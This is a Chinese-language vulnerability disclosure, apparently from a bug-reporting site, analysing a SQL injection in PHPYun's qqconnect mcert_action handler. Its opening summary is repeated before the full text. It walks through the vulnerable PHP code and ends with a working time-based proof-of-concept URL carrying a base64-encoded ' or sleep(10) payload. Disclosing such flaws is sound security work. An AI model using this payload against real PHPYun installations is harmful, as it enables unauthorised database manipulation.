### 简要描述: 问题很类似,官方安全意识有待加强 ### 详细说明: 问题出现在/model/qqconnect.class.php的mcert_action函数中: ``` function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){ $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } ``` id从$_GET['id']参数中取出然后经过了base64解码并分隔进入数组$arr,由于是base64解码所以绕过前端过滤: ``` $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); ``` 然后经过一段判断: ``` if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']) ``` $this->config['coding']默认为null,所以只需要保证$arr[2]也为null的话这个判断就可以通过,判断通过后进入以下语句: ``` $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); ``` 跟进DB_update_all: ``` function...
### 简要描述: 问题很类似,官方安全意识有待加强 ### 详细说明: 问题出现在/model/qqconnect.class.php的mcert_action函数中: ``` function mcert_action(){ $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']){ $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); $nid?$this->obj->ACT_msg($this->config['sy_weburl']."/index.php?M=login&usertype=1","激活成功"):$this->obj->ACT_msg($this->config['sy_weburl'],"激活失败,联系管理员认证"); }else{ $this->obj->ACT_msg($this->config['sy_weburl'],"非法操作!","2"); } } ``` id从$_GET['id']参数中取出然后经过了base64解码并分隔进入数组$arr,由于是base64解码所以绕过前端过滤: ``` $id=$_GET['id']; $arr=@explode("|",base64_decode($id)); ``` 然后经过一段判断: ``` if($id && is_array($arr) && $arr[0] && $arr[2]==$this->config['coding']) ``` $this->config['coding']默认为null,所以只需要保证$arr[2]也为null的话这个判断就可以通过,判断通过后进入以下语句: ``` $nid=$this->obj->DB_update_all("member","`email_status`='1'","`uid`='".$arr[0]."'"); ``` 跟进DB_update_all: ``` function DB_update_all($tablename, $value, $where = 1) { $SQL = "UPDATE `" . $this->def . $tablename . "` SET ".$value." WHERE ".$where; $this->db->query("set sql_mode=''"); $return=$this->db->query($SQL); return $return; } ``` 跟进query: ``` /*数据库执行语句,可执行查询添加修改删除等任何sql语句*/ public function query($sql) { if ($sql == "") { $this->show_error("SQL语句错误:", "SQL查询语句为空"); } $this->sql = $sql; $result = mysql_query($this->sql, $this->conn); if (!$result) { //调试中使用,sql语句出错时会自动打印出来 if ($this->show_error) { $this->show_error("错误SQL语句:", $this->sql); } } else { $this->result = $result; } if(1==1){ global $starttime; $dbbug_error2[]=" "; $dbbug_error2[sql]=$this->sql." "; $dbbug_error2["time"]=$this->getmicrotime()-$starttime." "; //$dbbug_error2[]=" "; //print_r($dbbug_error2);//查看sql语句 $this->debug=$dbbug_error; } return $this->result; } ``` 注入发生 ### 漏洞证明: 提交 ``` http://www.target.com/index.php?M=qqconnect&C=mcert&id=JyBvciBzbGVlcCgxMCk7I3x6dHo%3D ``` 后台会执行sleep(10) ``` UPDATE `phpyun_member` SET `email_status`='1' WHERE `uid`='' or sleep(10);# ```
